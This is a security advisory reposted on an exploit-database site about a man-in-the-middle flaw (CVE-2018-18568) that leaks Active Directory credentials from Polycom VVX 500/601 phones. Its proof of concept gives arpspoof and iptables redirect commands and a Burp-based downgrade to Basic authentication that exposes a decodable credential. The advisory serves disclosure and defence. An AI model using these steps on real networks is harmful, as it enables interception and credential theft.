0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle Vulnerability Product: VVX 500 / VVX 601 Manufacturer: Polycom Affected Version(s): <= 5.8.0.12848 Tested Version(s): 5.4.0.10182, 5.8.0.12848 Vulnerability Type: X.509 validation - Man-in-the-Middle (CWE-300) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18568 Author of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a Polycom VVX 500/601 [1] is used with an on-premise installation with Skype for Business, the phone has stored credentials of an account in the active directory. Performing a man-in-the-middle attack, the phone give the credentials to an attacker and therefore the account will be compromised. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone sends the stored credentials to a website usually named autodiscover via HTTPS, but no X.509 certificate validation is used. The credentials are sent with the challenge-response NetNTLM algorithm. Performing a downgrade attack to HTTP basic authentication, the credentials can be harvested Base64 encoded. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using Burp Suite as invisible proxy. Perform an ARP spoofing attack against the phone that the data traffic is going the the device were the Burp Suite is running. All attacks are started from the same device. # arpspoof -i eth0 -t 192.168.100.101 192.168.100.1 Set an iptables rule, that the traffic is sent to the Burp Suite, like # iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080 Enable rules with the Burp Suite to suppress these two response headers: WWW-Authenticate: Negotiate WWW-Authenticate: NTLM Now, an authentication downgrade attack is in place, too. Watch the proxy history for a HTTP POST request like POST /autodiscover/autodiscover.xml HTTP/1.1 Content-Type: text/xml; charset=utf-8 Content-Length: 454 Connection: close Accept-Encoding: gzip, deflate Accept-Language: en,* User-Agent: Mozilla/5.0 Host: autodiscover.example.com Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA== Decode the harvested Base64 encoded credential information. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware, which has a trust store integrated and a strict X.509 certificate validation policy, too. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-08-29: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html [2] SySS Security Advisory SYSS-2018-027 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ # 0day.today [2024-07-05] #